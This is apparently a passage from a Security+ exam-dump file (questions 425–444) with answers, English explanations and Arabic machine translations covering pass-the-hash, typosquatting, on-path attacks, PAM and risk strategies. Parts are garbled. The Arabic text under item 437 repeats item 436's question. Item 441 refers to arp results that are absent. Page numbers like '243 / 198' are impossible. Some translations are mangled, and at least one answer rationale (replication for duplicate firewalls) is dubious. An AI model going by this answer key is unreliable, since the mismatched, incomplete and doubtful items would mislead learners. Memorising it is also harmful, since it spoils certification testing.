some authentication protocols send hashes over the network instead of plain text passwords. The packet
capture shows that the attacker used NTLM authentication, which is vulnerable to pass-the-hash attacks
‫ ويؤكد المحللون أن المستخدم لم‬، ‫يلاحظ محللو الأمن تسجيل دخول الخادم من مستخدم كان في إجازة لمدة أسبوعين‬.425
‫ أي مما يلي حدث؟‬:‫ يلاحظ المحللون ما يلي‬، ‫يقم بتسجيل الدخول إلى النظام أثناء الإجازة بعد مراجعة التقاط الحزمة‬
.‫استخدم المهاجم هجوم تمرير التجزئة للوصول إليه‬
‫ ثم يحاول المهاجم‬.‫ هجوم تمرير التجزئة هو نوع من هجوم إعادة التشغيل الذي يلتقط ويستخدم تجزئة كلمة المرور‬:‫تفسير‬
‫ هذا النوع من الهجوم ممكن لأن بعض بروتوكولات المصادقة ترسل‬.‫تسجيل الدخول كمستخدم باستخدام التجزئة المسروقة‬
‫ وهو عرضة‬، NTLM ‫ يظهر التقاط الحزمة أن المهاجم استخدم مصادقة‬.‫تجزئات عبر الشبكة بدلا من كلمات مرور النص العادي‬
‫لهجمات تمرير التجزئة‬
243 / 198
The safer , easier way to help you pass any IT exams.
426.A security manager is attempting to meet multiple security objectives in the next fiscal year.
The security manager has proposed the purchase of the following four items:
Vendor A:
1- Firewall
1-12 switch
Vendor B:
1- Firewall
1-12 switch
Which of the following security objectives is the security manager attempting to meet? (Select two).
A. Simplified patch management
B. Scalability
C. Zero-day attack tolerance
D. Multipath
E. Replication
F. Redundancy
Answer: E,F
Explanation:
F. Redundancy is a security objective that aims to ensure availability and resilience of systems and data
by having backup or alternative components or resources that can take over in case of a failure. By
purchasing two firewalls and two switches from different vendors, the security manager is creating
redundancy for the network devices and reducing the single point of failure risk.
E. Replication is a security objective that aims to ensure integrity and availability of data by creating
copies or duplicates of the data across different locations or devices. By purchasing two firewalls and two
switches from different vendors, the security manager is enabling replication of the network traffic and
data across different paths and devices.
‫ اقترح مدير الأمن شراء‬.‫ و يحاول أحد مديري الأمن تحقيق أهداف أمنية متعددة في السنة المالية المقبلة‬-426
:‫العناصر الأربعة التالية‬
: ‫البائع أ‬
‫ جدار الحماية‬-1
‫ تبديل البائع‬12-1
:‫البائع ب‬
‫ جدار الحماية‬-1
‫ التبديل‬12-1
‫ ؟ نسخ متماثل التكرار‬.)‫أي من أهداف الأمان التالية يحاول مدير الأمن تحقيقها؟ (حدد اثنين‬
‫ التكرار هو هدف أمني يهدف إلى ضمان توافر ومرونة الأنظمة والبيانات من خلال وجود مكونات احتياطية أو بديلة‬.F :‫تفسير‬
‫ من خلال شراء اثنين من جدران الحماية ومحولين من بائعين‬.‫أو موارد يمكن أن تتولى المسؤولية في حالة حدوث عطل‬
‫ النسخ المتماثل هو هدف‬.E .‫ يقوم مدير الأمان بإنشاء تكرار لأجهزة الشبكة وتقليل نقطة واحدة من مخاطر الفشل‬، ‫مختلفين‬
.‫أمني يهدف إلى ضمان سلامة البيانات وتوافرها عن طريق إنشاء نسخ أو نسخ مكررة من البيانات عبر مواقع أو أجهزة مختلفة‬
‫ يقوم مدير الأمان بتمكين النسخ المتماثل لحركة مرور‬، ‫من خلال شراء اثنين من جدران الحماية ومحولين من بائعين مختلفين‬
.‫الشبكة والبيانات عبر مسارات وأجهزة مختلفة‬
244 / 198
The safer , easier way to help you pass any IT exams.
427.Which Of the following vulnerabilities is exploited an attacker Overwrite a register with a malicious
address that changes the execution path?
A. VM escape
B. SQL injection
C. Buffer overflow
D. Race condition
Answer: C
Explanation:
A buffer overflow is a type of vulnerability that occurs when an attacker sends more data than a buffer
can hold, causing the excess data to overwrite adjacent memory locations such as registers. It can allow
an attacker to overwrite a register with a malicious address that changes the execution path and
executes arbitrary code on the target system
‫أي من الثغرات الأمنية التالية يتم استغلالها مهاجم الكتابة فوق سجل بعنوان ضار يغير مسار التنفيذ؟‬.427
‫تجاوز سعة المخزن المؤقت‬
‫ تجاوز سعة المخزن المؤقت هو نوع من الثغرات الأمنية التي تحدث عندما يرسل مهاجم بيانات أكثر مما يمكن أن‬:‫تفسير‬
‫ يمكن أن‬.‫ مما يتسبب في قيام البيانات الزائدة بالكتابة فوق مواقع الذاكرة المجاورة مثل السجلات‬، ‫يحتفظ به المخزن المؤقت‬
‫يسمح للمهاجم بالكتابة فوق سجل بعنوان ضار يغير مسار التنفيذ وينفذ تعليمات برمجية عشوائية على النظام المستهدف‬
428.An email security vendor recently added a retroactive alert after discovering a phishing email had
already been delivered to an inbox.
Which of the following would be the best way for the security administrator to address this type of alert in
the future?
A. Utilize a SOAR playbook to remove the phishing message.
B. Manually remove the phishing emails when alerts arrive.
C. Delay all emails until the retroactive alerts are received.
D. Ingest the alerts into a SIEM to correlate with delivered messages.
Answer: A
Explanation:
One possible way to address this type of alert in the future is to use a SOAR (Security Orchestration,
Automation, and Response) playbook to automatically remove the phishing message from the inbox3. A
SOAR playbook is a set of predefined actions that can be triggered by certain events or conditions. This
can help reduce the response time and human error in dealing with phishing alerts.
‫أضاف أحد موردي أمن البريد الإلكتروني مؤخرا تنبيها بأثر رجعي بعد اكتشاف أن بريدا إلكترونيا للتصيد الاحتيالي قد تم‬-428
‫ أي مما يلي سيكون أفضل طريقة لمسؤول الأمان لمعالجة هذا النوع من التنبيهات في‬.‫تسليمه بالفعل إلى صندوق الوارد‬
‫المستقبل؟‬
.‫ لإزالة رسالة التصيد الاحتيالي‬SOAR ‫استخدم دليل مبادئ‬
‫ (تنسيق‬SOAR ‫ تتمثل إحدى الطرق الممكنة لمعالجة هذا النوع من التنبيهات في المستقبل في استخدام دليل تشغيل‬:‫تفسير‬
‫ هو مجموعة من‬SOAR ‫ دليل تشغيل‬.3‫الأمان والأتمتة والاستجابة) لإزالة رسالة التصيد الاحتيالي تلقائيا من البريد الوارد‬
‫ يمكن أن يساعد ذلك في تقليل وقت‬.‫الإجراءات المحددة مسبقا والتي يمكن تشغيلها بواسطة أحداث أو شروط معينة‬
.‫الاستجابة والخطأ البشري في التعامل مع تنبيهات التصيد الاحتيالي‬
245 / 198
The safer , easier way to help you pass any IT exams.
429.Which of the following social engineering attacks best describes an email that is primarily intended
to mislead recipients into forwarding the email to others?
A. Hoaxing
B. Pharming
C. Watering-hole
D. Phishing
Answer: A
Explanation:
Hoaxing is a type of social engineering attack that involves sending false or misleading information via
email or other means to trick recipients into believing something that is not true. Hoaxing emails often
contain a request or an incentive for the recipients to forward the email to others, such as a warning of a
virus, a promise of a reward, or a petition for a cause. The goal of hoaxing is to spread misinformation,
cause panic, waste resources, or damage reputations.
A hoaxing email is primarily intended to mislead recipients into forwarding the email to others, which can
increase the reach and impact of the hoax.
‫أي من هجمات الهندسة الاجتماعية التالية تصف بشكل أفضل رسالة بريد إلكتروني تهدف في المقام الأول إلى تضليل‬.429
‫المستلمين لإعادة توجيه البريد الإلكتروني إلى الآخرين؟ الخداع‬
‫ الخداع هو نوع من هجمات الهندسة الاجتماعية التي تنطوي على إرسال معلومات خاطئة أو مضللة عبر البريد‬:‫تفسير‬
‫ غالبا ما تحتوي رسائل البريد الإلكتروني المخادعة على‬.‫الإلكتروني أو وسائل أخرى لخداع المستلمين لتصديق شيء غير صحيح‬
‫ أو التماس‬، ‫ وعد بمكافأة‬، ‫ مثل تحذير من فيروس‬، ‫طلب أو حافز للمستلمين لإعادة توجيه البريد الإلكتروني إلى الآخرين‬
‫ تهدف‬.‫ الهدف من الخداع هو نشر معلومات مضللة أو التسبب في حالة من الذعر أو إهدار الموارد أو الإضرار بالسمعة‬.‫لقضية‬
‫ مما‬، ‫رسالة البريد الإلكتروني المخادعة في المقام الأول إلى تضليل المستلمين لإعادة توجيه البريد الإلكتروني إلى الآخرين‬
.‫قد يزيد من مدى وصول الخدعة وتأثيرها‬
430.An employee's laptop was stolen last month. This morning, the was returned by the A cyber security
analyst retrieved laptop and has since cybersecurity incident checklist Four incident handlers are
responsible for executing the checklist. Which of the following best describes the process for evidence
collection assurance?
A. Time stamp
B. Chain of custody
C. Admissibility
D. Legal hold
Answer: B
Explanation:
Chain of custody is a process that documents the chronological and logical sequence of custody, control,
transfer, analysis, and disposition of materials, including physical or electronic evidence. Chain of
custody is important to ensure the integrity and admissibility of evidence in legal proceedings. Chain of
custody can help evidence collection assurance by providing proof that the evidence has been handled
properly and has not been tampered with or contaminated.
‫ تم إرجاع الكمبيوتر المحمول من قبل محلل الأمن‬، ‫ هذا الصباح‬.‫ وسرق حاسوب محمول خاص بموظف الشهر الماضي‬-430
‫السيبراني الذي تم استرداده ومنذ ذلك الحين قائمة التحقق من حوادث الأمن السيبراني أربعة معالجين للحوادث مسؤولون‬
‫ أي مما يلي يصف عملية ضمان جمع الأدلة؟ سلسلة العهدة‬.‫عن تنفيذ قائمة المراجعة‬
‫ بما‬، ‫ سلسلة العهدة هي عملية توثق التسلسل الزمني والمنطقي للعهدة والتحكم ونقل وتحليل والتخلص من المواد‬:‫تفسير‬
‫ يمكن أن‬.‫ تسلسل العهدة مهم لضمان نزاهة ومقبولية الأدلة في الإجراءات القانونية‬.‫في ذلك الأدلة المادية أو الإلكترونية‬
‫يساعد تسلسل العهدة في ضمان جمع الأدلة من خلال تقديم دليل على أن الأدلة قد تم التعامل معها بشكل صحيح ولم يتم‬
.‫العبث بها أو تلوثها‬
246 / 198
The safer , easier way to help you pass any IT exams.
431.A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks
exactly like the legitimate website. Which of the following best describes this type of attack?
A. Reconnaissance
B. Impersonation
C. Typo squatting
D. Watering-hole
Answer: C
Explanation:
Typo squatting is a type of cyberattack that involves registering domains with deliberately misspelled
names of well-known websites. The attackers do this to lure unsuspecting visitors to alternative websites,
typically for malicious purposes. Visitors may end up at these alternative websites by inadvertently
mistyping the name of popular websites into their web browser or by being lured by a phishing scam.
The attackers may emulate the look and feel of the legitimate websites and trick users into entering
sensitive information or downloading malware.
‫ يبدو موقع الويب الضار تماما مثل موقع‬.‫ ولكنه يزورها عن طريق الخطأ‬http://comptiia.org ‫ يحاول مرشح الذهاب إلى‬-431
‫ أي من الآتي يصف هذا النوع من الهجوم؟ خطأ مطبعي القرفصاء؟‬.‫الويب الشرعي‬
‫ القرفصاء المطبعي هو نوع من الهجمات الإلكترونية التي تنطوي على تسجيل النطاقات بأسماء بها أخطاء إملائية‬:‫تفسير‬
.‫ عادة لأغراض ضارة‬، ‫ يقوم المهاجمون بذلك لجذب الزوار المطمئنين إلى مواقع ويب بديلة‬.‫متعمدة لمواقع الويب المعروفة‬
‫قد ينتهي الأمر بالزوار في هذه المواقع البديلة عن طريق كتابة اسم مواقع الويب الشائعة عن غير قصد في متصفح الويب‬
‫ قد يحاكي المهاجمون شكل ومظهر مواقع الويب الشرعية‬.‫الخاص بهم أو عن طريق إغرائهم بعملية احتيال تصيد احتيالي‬
.‫ويخدعون المستخدمين لإدخال معلومات حساسة أو تنزيل برامج ضارة‬
432.A web server log contains two million lines. A security analyst wants to obtain the next 500 lines
starting from line 4,600. Which of the following commands will help the security analyst to achieve
this objective?
A. cat webserver.log | head -4600 | tail +500 |
B. cat webserver.log | tail -1995400 | tail -500 |
C. cat webserver.log | tail -4600 | head -500 |
D. cat webserver.log | head -5100 | tail -500 |
Answer: D
Explanation:
the cat command displays the contents of a file, the head command displays the first lines of a file, and
the tail command displays the last lines of a file. To display a specific number of lines from a file, you can
use a minus sign followed by a number as an option for head or tail. For example, head -10 will display
the first 10 lines of a file. To obtain the next 500 lines starting from line 4,600, you need to use both head
and tail commands.
‫ أي‬.4,600 ‫ سطر قادم بدءا من السطر‬500 ‫ يريد محلل أمني الحصول على‬.‫ يحتوي سجل خادم الويب على مليوني سطر‬-432
‫من الأوامر التالية سيساعد محلل الأمان على تحقيق هذا الهدف؟‬
‫خادم الويب من‬Cat.log | 500- ‫ | الذيل‬5100- ‫| رئيس‬
‫ ويعرض أمر الذيل الأسطر الأخيرة من‬،‫ ويعرض أمر الرأس الأسطر الأولى من الملف‬،‫ يعرض أمر محتويات الملف‬:‫تفسير‬
‫ على سبيل‬.‫ يمكنك استخدام علامة الطرح متبوعة برقم كخيار للرأس أو الذيل‬، ‫ لعرض عدد محدد من الأسطر من ملف‬.‫الملف‬
‫ تحتاج إلى استخدام‬، 4600 ‫ سطر التالية بدءا من السطر‬500 ‫ للحصول على‬.‫ أسطر من الملف‬10 ‫ أول‬10- ‫ سيعرض الرأس‬، ‫المثال‬
.‫كل من أوامر الرأس والذيل‬
247 / 198
The safer , easier way to help you pass any IT exams.
433.Which of the following is a primary security concern for a company setting up a BYOD program?
A. End of life
B. Buffer overflow
C. VM escape
D. Jailbreaking
Answer: D
Explanation:
Jailbreaking is a process of bypassing or removing the manufacturer-imposed restrictions on a mobile
device’s operating system, allowing users to install unauthorized applications, modify settings, etc. It is a
primary security concern for setting up a BYOD program because it can expose the device and its data
to malware, vulnerabilities, unauthorized access, etc.
‫أي مما يلي يمثل شاغلا أمنيا رئيسيا لشركة تنشئ برنامج بيود؟ الهروب من السجن‬.433
‫ مما‬، ‫ كسر الحماية هو عملية تجاوز أو إزالة القيود التي تفرضها الشركة المصنعة على نظام تشغيل الجهاز المحمول‬:‫التفسير‬
‫ إنه مصدر قلق أمني أساسي لإعداد‬.‫ وما إلى ذلك‬، ‫ وتعديل الإعدادات‬، ‫يسمح للمستخدمين بتثبيت تطبيقات غير مصرح بها‬
.‫برنامج بيود لأنه يمكن أن يعرض الجهاز وبياناته للبرامج الضارة ونقاط الضعف والوصول غير المصرح به وما إلى ذلك‬
434.The management team has requested that the security team implement 802.1X into the existing
wireless network setup.
The following requirements must be met:
• Minimal interruption to the end user
• Mutual certificate validation
Which of the following authentication protocols would meet these requirements?
A. EAP-FAST
B. PSK
C. EAP-TTLS
D. EAP-TLS
Answer: D
Explanation:
EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) is an authentication protocol
that uses certificates to provide mutual authentication between the client and the authentication server. It
also allows for the encryption of user credentials, making EAP-TLS a secure and reliable authentication
protocol. According to the CompTIA Security+ SY0-601 Official Text Book, EAP-TLS is well-suited for
wireless networks due to its mutual authentication capabilities and its ability to securely store credentials.
It is also the preferred authentication protocol for 802.1X wireless networks.
‫ يجب استيفاء المتطلبات‬.‫ في إعداد الشبكة اللاسلكية الحالية‬X802.1 ‫ طلب فريق الإدارة أن يقوم فريق الأمن بتنفيذ‬-434
‫ الحد الأدنى من الانقطاع للمستخدم النهائي التحقق من صحة الشهادة المتبادلة أي من بروتوكولات المصادقة التالية‬:‫التالية‬
‫يفي بهذه المتطلبات؟ ايب تي ال اس‬
EAP :‫تفسير‬
‫ أمان طبقة النقل) هو بروتوكول مصادقة يستخدم الشهادات لتوفير مصادقة‬- ‫ (بروتوكول المصادقة القابل للتوسيع‬TLS‫ بروتوكول مصادقة‬TLS-EAP ‫ مما يجعل‬، ‫ كما يسمح بتشفير بيانات اعتماد المستخدم‬.‫متبادلة بين العميل وخادم المصادقة‬
‫ مناسب تماما للشبكات‬TLS-EAP ‫ فإن‬، 601-SY0 + Security CompTIA ‫ وفقا للكتاب النصي الرسمي‬.‫آمنا وموثوقا به‬
‫ وهو أيضا بروتوكول المصادقة‬.‫اللاسلكية نظرا لقدرات المصادقة المتبادلة وقدرته على تخزين بيانات الاعتماد بشكل آمن‬
x802.1 ‫المفضل للشبكات اللاسلكية‬
248 / 198
The safer , easier way to help you pass any IT exams.
435.The new Chief Information Security Officer at a company has asked the security learn to implement
stronger user account policies.
The new policies require:
• Users to choose a password unique to their last ten passwords
• Users to not log in from certain high-risk countries
Which of the following should the security team implement? (Select two).
A. Password complexity
B. Password history
C. Geolocation
D. Geospatial
E. Geotagging
F. Password reuse
Answer: B,C
Explanation:
Password history is a policy that prevents users from reusing their previous passwords.
This can reduce the risk of password cracking or compromise. Geolocation is a policy that restricts users
from logging in from certain locations based on their IP address. This can prevent unauthorized access
from high-risk countries or regions.
‫ طلب كبير موظفي أمن المعلومات الجديد في إحدى الشركات من الأمن أن يتعلم تنفيذ سياسات أقوى لحساب‬-435
‫ يختار المستخدمون كلمة مرور فريدة لآخر عشر كلمات مرور يجب على‬:‫ تتطلب السياسات الجديدة ما يلي‬.‫المستخدم‬
.)‫المستخدمين عدم تسجيل الدخول من بعض البلدان عالية الخطورة أي مما يلي يجب على فريق الأمان تنفيذه؟ (حدد اثنين‬
‫سجل كلمات المرور _ تحديد الموقع الجغرافي‬
‫ هذا يمكن أن يقلل من‬.‫ سجل كلمات المرور هو سياسة تمنع المستخدمين من إعادة استخدام كلمات المرور السابقة‬:‫تفسير‬
‫ تحديد الموقع الجغرافي هو سياسة تقيد المستخدمين من تسجيل الدخول من مواقع‬.‫خطر تكسير كلمة المرور أو اختراقها‬
.‫ يمكن أن يمنع ذلك الوصول غير المصرح به من البلدان أو المناطق عالية الخطورة‬.‫ الخاص بهم‬IP ‫معينة بناء على عنوان‬
249 / 198
The safer , easier way to help you pass any IT exams.
436.A security engineer updated an application on company workstations. The application was running
before the update, but it is no longer launching successfully.
Which of the following most likely needs to be updated?
A. Blocklist
B. Deny list
C. Quarantine list
D. Approved fist
Answer: D
Explanation:
Approved list is a list of applications or programs that are allowed to run on a system or network. An
approved list can prevent unauthorized or malicious software from running and compromising the
security of the system or network. An approved list can also help with patch management and
compatibility issues. If the security engineer updated an application on the company workstations, the
application may need to be added or updated on the approved list to be able to launch successfully.
‫ لكنه لم يعد‬، ‫ كان التطبيق قيد التشغيل قبل التحديث‬.‫ وقام مهندس أمن بتحديث تطبيق على محطات عمل الشركة‬-436
‫ أي مما يلي يحتاج على الأرجح إلى التحديث؟ القبضة المعتمدة‬.‫يعمل بنجاح‬
‫ يمكن أن تمنع القائمة‬.‫ القائمة المعتمدة هي قائمة بالتطبيقات أو البرامج المسموح بتشغيلها على نظام أو شبكة‬:‫تفسير‬
‫ يمكن أن تساعد القائمة‬.‫المعتمدة تشغيل البرامج غير المصرح بها أو الضارة وتعريض أمان النظام أو الشبكة للخطر‬
‫ فإن‬، ‫ إذا قام مهندس الأمن بتحديث تطبيق على محطات عمل الشركة‬.‫المعتمدة أيضا في إدارة التصحيح ومشكلات التوافق‬
.‫قد يلزم إضافة التطبيق أو تحديثه في القائمة المعتمدة ليتمكن من التشغيل بنجاح‬
250 / 198
The safer , easier way to help you pass any IT exams.
437.A company owns a public-facing e-commerce website. The company outsources credit card
transactions to a payment company.
Which of the following BEST describes the role of the payment company?
A. Data controller
B. Data custodian
C. Data owners
D. Data processor
Answer: D
Explanation:
A data processor is an organization that processes personal data on behalf of a data controller. In this
scenario, the company that owns the e-commerce website is the data controller, as it determines the
purposes and means of processing personal data (e.g. credit card information). The payment company is
a data processor, as it processes personal data on behalf of the e-commerce company (i.e. it processes
credit card transactions).
‫ لكنه لم يعد‬، ‫ كان التطبيق قيد التشغيل قبل التحديث‬.‫ وقام مهندس أمن بتحديث تطبيق على محطات عمل الشركة‬-436
‫ أي مما يلي يحتاج على الأرجح إلى التحديث؟ معالج البيانات‬.‫يعمل بنجاح‬
‫ تكون‬، ‫ في هذا السيناريو‬.‫ معالج البيانات هو مؤسسة تعالج البيانات الشخصية نيابة عن وحدة التحكم في البيانات‬:‫تفسير‬
‫ حيث تحدد أغراض ووسائل معالجة البيانات الشخصية‬، ‫الشركة المالكة لموقع التجارة الإلكترونية هي المتحكم في البيانات‬
‫ حيث تقوم بمعالجة البيانات الشخصية نيابة عن شركة التجارة‬، ‫ شركة الدفع هي معالج بيانات‬.)‫(مثل معلومات بطاقة الائتمان‬
.)‫الإلكترونية (أي أنها تعالج معاملات بطاقات الائتمان‬
438.A cybersecurity analyst needs to adopt controls to properly track and log user actions to an
individual. Which of the following should the analyst implement?
A. Non-repudiation
B. Baseline configurations
C. MFA
D. DLP
Answer: A
Explanation:
Non-repudiation is the process of ensuring that a party involved in a transaction or communication
cannot deny their involvement. By implementing non-repudiation controls, a cybersecurity analyst can
properly track and log user actions, attributing them to a specific individual. This can be achieved through
methods such as digital signatures, timestamps, and secure logging mechanisms.
‫ أي مما‬.‫ ويحتاج محلل الأمن السيبراني إلى اعتماد ضوابط لتتبع إجراءات المستعملين وتسجيلها للفرد على نحو سليم‬-438
‫يلي يجب على المحلل تنفيذه؟ عدم الانكار او التنصل‬
‫ من خلال تنفيذ‬.‫ عدم التنصل هو عملية ضمان أن الطرف المشارك في معاملة أو اتصال لا يمكنه إنكار مشاركته‬:‫تفسير‬
.‫ ونسبها إلى فرد معين‬، ‫ يمكن لمحلل الأمن السيبراني تتبع إجراءات المستخدم وتسجيلها بشكل صحيح‬، ‫ضوابط عدم التنصل‬
.‫يمكن تحقيق ذلك من خلال طرق مثل التوقيعات الرقمية والطوابع الزمنية وآليات التسجيل الآمنة‬
251 / 198
The safer , easier way to help you pass any IT exams.
439.A security administrator Is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used (or administrative duties.
• Administrative accounts must be temporal in nature.
• Each administrative account must be assigned to one specific user.
• Accounts must have complex passwords.
• Audit trails and logging must be enabled on all systems.
Which of the following solutions should the administrator deploy to meet these requirements?
A. ABAC
B. SAML
C. PAM
D. CASB
Answer: C
Explanation:
The best solution to meet the given requirements is to deploy a Privileged Access Management (PAM)
solution. PAM solutions allow administrators to create and manage administrative accounts that are
assigned to specific users and that have complex passwords. Additionally, PAM solutions provide the
ability to enable audit trails and logging on all systems, as well as to set up temporal access for
administrative accounts. SAML, ABAC, and CASB are not suitable for this purpose.
‫ يجب عدم استخدام حسابات تسجيل الدخول الشائعة (أو‬:‫يقوم مسؤول الأمن بإدارة الوصول الإداري إلى الأنظمة الحساسة بالمتطلبات التالية‬.439
‫ يجب أن تحتوي الحسابات‬.‫ يجب تعيين كل حساب إداري لمستخدم واحد محدد‬.‫ يجب أن تكون الحسابات الإدارية مؤقتة بطبيعتها‬.‫الواجبات الإدارية‬
‫ أي من الحلول التالية يجب على المسؤول نشرها لتلبية هذه‬.‫ يجب تمكين مسارات التدقيق والتسجيل على جميع الأنظمة‬.‫على كلمات مرور معقدة‬
‫المتطلبات؟بام‬
‫ للمسؤولين بإنشاء وإدارة الحسابات‬PAM ‫ تسمح حلول‬.)PAM( ‫ أفضل حل لتلبية المتطلبات المحددة هو نشر حل إدارة الوصول المميز‬:‫تفسير‬
‫ القدرة على تمكين‬PAM ‫ توفر حلول‬، ‫ بالإضافة إلى ذلك‬.‫الإدارية التي تم تعيينها لمستخدمين محددين والتي تحتوي على كلمات مرور معقدة‬
‫ ليست‬CASB ‫ و‬ABAC ‫ و‬SAML .‫ بالإضافة إلى إعداد الوصول الزمني للحسابات الإدارية‬، ‫مسارات التدقيق وتسجيل الدخول على جميع الأنظمة‬
.‫مناسبة لهذا الغرض‬
440.A company recently completed the transition from data centers to the cloud.
Which of the following solutions will best enable the company to detect security threats in applications
that run in isolated environments within the cloud environment?
A. Security groups
B. Container security
C. Virtual networks
D. Segmentation
Answer: B
Explanation:
Container security is a solution that can enable the company to detect security threats in applications that run in isolated
environments within the cloud environment. Containers are units of software that package code and dependencies
together, allowing applications to run quickly and reliably across different computing environments. Container security
involves securing the container images, the container runtime, and the container orchestration platforms. Container
security can help prevent unauthorized access, data breaches, malware infections, or denial-of-service attacks on the
applications running in containers.
‫ أي من الحلول التالية سيمكن الشركة بشكل أفضل من اكتشاف‬.‫ أكملت إحدى الشركات مؤخرا الانتقال من مراكز البيانات إلى السحابة‬-440
‫التهديدات الأمنية في التطبيقات التي تعمل في بيئات معزولة داخل البيئة السحابية؟ أمن الحاويات‬
‫ أمان الحاويات هو حل يمكن أن يمكن الشركة من اكتشاف التهديدات الأمنية في التطبيقات التي تعمل في بيئات معزولة داخل البيئة‬:‫تفسير‬
‫ مما يسمح بتشغيل التطبيقات بسرعة وموثوقية عبر‬، ‫ الحاويات هي وحدات من البرامج التي تجمع التعليمات البرمجية والتبعيات معا‬.‫السحابية‬
‫ يمكن أن يساعد أمان الحاوية‬.‫ يتضمن أمان الحاوية تأمين صور الحاوية ووقت تشغيل الحاوية ومنصات تنسيق الحاوية‬.‫بيئات الحوسبة المختلفة‬
.‫في منع الوصول غير المصرح به أو خروقات البيانات أو الإصابة بالبرامج الضارة أو هجمات رفض الخدمة على التطبيقات التي تعمل في الحاويات‬
252 / 198
The safer , easier way to help you pass any IT exams.
441.A security analyst is investigating network issues between a workstation and a company server. The
workstation and server occasionally experience service disruptions, and employees are forced to
reconnect to the server. In addition, some reports indicate sensitive information is being leaked from the
server to the public.
The workstation IP address is 192.168.1.103, and the server IP address is 192.168.1.101.
The analyst runs arp -a On a separate workstation and obtains the following results:
Which of the following is most likely occurring?
A. Evil twin attack
B. Domain hijacking attack
C. On-path attack
D. MAC flooding attack
Answer: C
Explanation:
An on-path attack is a type of attack where an attacker places themselves between two devices (such as
a workstation and a server) and intercepts or modifies the communications between them. An on-path
attacker can collect sensitive information, impersonate either device, or disrupt the service. In this
scenario, the attacker is likely using an on-path attack to capture and alter the network traffic between
the workstation and the server, causing service disruptions and data leakage.
‫ تواجه محطة العمل والخادم أحيانا‬.‫ يقوم محلل أمني بالتحقيق في مشاكل الشبكة بين محطة عمل وخادم الشركة‬-441
‫ تشير بعض التقارير إلى تسريب‬، ‫ بالإضافة إلى ذلك‬.‫ ويضطر الموظفون إلى إعادة الاتصال بالخادم‬، ‫اضطرابات في الخدمة‬
‫ يقوم‬.192.168.1.101 ‫ للخادم هو‬IP ‫ وعنوان‬، 192.168.1.103 ‫ لمحطة العمل هو‬IP ‫ عنوان‬.‫معلومات حساسة من الخادم إلى الجمهور‬
‫ أي مما يلي يحدث على الأرجح؟‬:‫ على محطة عمل منفصلة ويحصل على النتائج التالية‬a- arp ‫المحلل بتشغيل‬
‫هجوم على الطريق‬
‫ الهجوم على المسار هو نوع من الهجوم حيث يضع المهاجم نفسه بين جهازين (مثل محطة عمل وخادم) ويعترض أو‬:‫تفسير‬
‫ يمكن للمهاجم على المسار جمع معلومات حساسة أو انتحال شخصية أي من الجهازين أو تعطيل‬.‫يعدل الاتصالات بينهما‬
‫ من المحتمل أن يستخدم المهاجم هجوما على المسار لالتقاط حركة مرور الشبكة وتغييرها بين‬،‫ في هذا السيناريو‬.‫الخدمة‬
.‫ مما يتسبب في حدوث اضطرابات في الخدمة وتسرب البيانات‬،‫محطة العمل والخادم‬
253 / 198
The safer , easier way to help you pass any IT exams.
442.Which of the following would most likely include language prohibiting end users from accessing
personal email from a company device?
A. SLA
B. BPA
C. NDA
D. AUP
Answer: D
Explanation:
AUP or Acceptable Use Policy is a document that defines the rules and guidelines for using a company’s
IT resources, such as devices, networks, internet, email, etc. It usually includes language prohibiting end
users from accessing personal email from a company device, as well as other activities that may
compromise security or productivity1 .
‫أي مما يلي سيشمل على الأرجح لغة تمنع المستخدمين النهائيين من الوصول إلى البريد الإلكتروني الشخصي من جهاز‬.442
‫الشركة؟ اوب‬
‫ سياسة الاستخدام المقبول أو سياسة الاستخدام المقبول هي وثيقة تحدد القواعد والإرشادات لاستخدام موارد‬:‫تفسير‬
‫ وعادة ما تتضمن‬.‫ مثل الأجهزة والشبكات والإنترنت والبريد الإلكتروني وما إلى ذلك‬، ‫تكنولوجيا المعلومات الخاصة بالشركة‬
‫ بالإضافة إلى الأنشطة الأخرى‬،‫لغة تمنع المستخدمين النهائيين من الوصول إلى البريد الإلكتروني الشخصي من جهاز الشركة‬
.1‫التي قد تعرض الأمان أو الإنتاجية للخطر‬
443.An organization decided not to put controls in place because of the high cost of implementing the
controls compared to the cost of a potential fine.
Which of the following risk management strategies is the organization following?
A. Transference
B. Avoidance
C. Mitigation
D. Acceptance
Answer: D
Explanation:
Acceptance is a risk management strategy that involves acknowledging the existence and potential
impact of a risk, but deciding not to take any action to reduce or eliminate it. This strategy is usually
adopted when the cost of implementing controls outweighs the benefit of mitigating the risk, or when the
risk is deemed acceptable or unavoidable. In this case, the organization decided not to put controls in
place because of the high cost compared to the potential fine, which means they accepted the risk.
‫ أي من‬.‫ قررت إحدى المنظمات عدم وضع ضوابط بسبب ارتفاع تكلفة تنفيذ الضوابط مقارنة بتكلفة الغرامة المحتملة‬-443
‫استراتيجيات إدارة المخاطر التالية تتبعها المنظمة؟‬
‫القبول‬
‫ ولكن مع اتخاذ قرار بعدم‬، ‫ القبول هو استراتيجية لإدارة المخاطر تتضمن الاعتراف بوجود المخاطر وتأثيرها المحتمل‬:‫التفسير‬
‫ وعادة ما يتم اعتماد هذه الاستراتيجية عندما تفوق تكلفة تنفيذ الضوابط فائدة‬.‫اتخاذ أي إجراء لتقليلها أو القضاء عليها‬
‫ قررت المنظمة عدم وضع ضوابط‬، ‫ في هذه الحالة‬.‫ أو عندما تعتبر المخاطر مقبولة أو لا مفر منها‬،‫التخفيف من المخاطر‬
.‫ مما يعني أنها قبلت المخاطرة‬، ‫بسبب التكلفة العالية مقارنة بالغرامة المحتملة‬
254 / 198
The safer , easier way to help you pass any IT exams.
444.An air traffic controller receives a change in flight plan for an morning aircraft over the phone. The air
traffic controller compares the change to what appears on radar and determines the information to be
false. As a result, the air traffic controller is able to prevent an incident from occurring.
Which of the following is this scenario an example of?
A. Mobile hijacking
B. Vishing
C. Unsecure VoIP protocols
D. SPIM attack
Answer: B
Explanation:
Vishing is a form of phishing that uses voice calls or voice messages to trick victims into revealing
personal information, such as credit card numbers, bank details, or passwords. Vishing often uses
spoofed phone numbers, voice-altering software, or social engineering techniques to impersonate
legitimate organizations or authorities. In this scenario, the caller pretended to be someone who could
change the flight plan of an aircraft, which could have caused a serious incident.
‫ يقارن مراقب الحركة الجوية التغيير بما‬.‫ يتلقى مراقب الحركة الجوية تغييرا في خطة الطيران لطائرة صباحية عبر الهاتف‬-444
